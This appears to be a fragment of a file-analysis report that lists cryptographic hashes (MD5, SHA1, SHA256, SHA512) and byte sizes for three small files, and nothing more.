SHA512: f02cbaa3a88c11d3e3cf85638087ec74a9645547be63ed6f648bec0800c5190563647d3c998da3750cb3038687495cc036c4ba28dd7994f67e7fab2357e78aae

Filesize: 147B
MD5: edf3c75d866bd1bdbc903da388aa4183
SHA1: da5760b42e012281468f8224ae97484ba7c33b0d
SHA256: 251daf1d44d3e25e8684f5c261f44617cb11a1d1610a9dc2adf2250b430e4503
SHA512: cf34f6215bf41d45764d83be0c224af612bec3ee07dc840ba6cddcdf3ad251c77ba28f904561b265c516c1ac2031b96bbf41a21333400e1cc002e9bd5a3b068c

Filesize: 2B
MD5: f3b25701fe362ec84616a93a45ce9998
SHA1: d62636d8caec13f04e28442a0a6fa1afeb024bbb
SHA256: b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209
SHA512: 98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84

Filesize: 349B
MD5: 28e4eda7451c625bbe806b745753f729
SHA1: d29e9b2c2ac5b10188cbae92cffba6827728543d
SHA256: da79e10cdff90aa7f5ab3d3f226570107ecd20d48eb14067c7900367111df5ba
SHA512: 932f53b6cd2aa55ab1475d85528069357fa7d9eea26051d1a4edb11872ca30d02c31c44bed3a48f0ccdbebe556e9d8ec2f4a0815bf177d93ab4272b3fe2fb0b5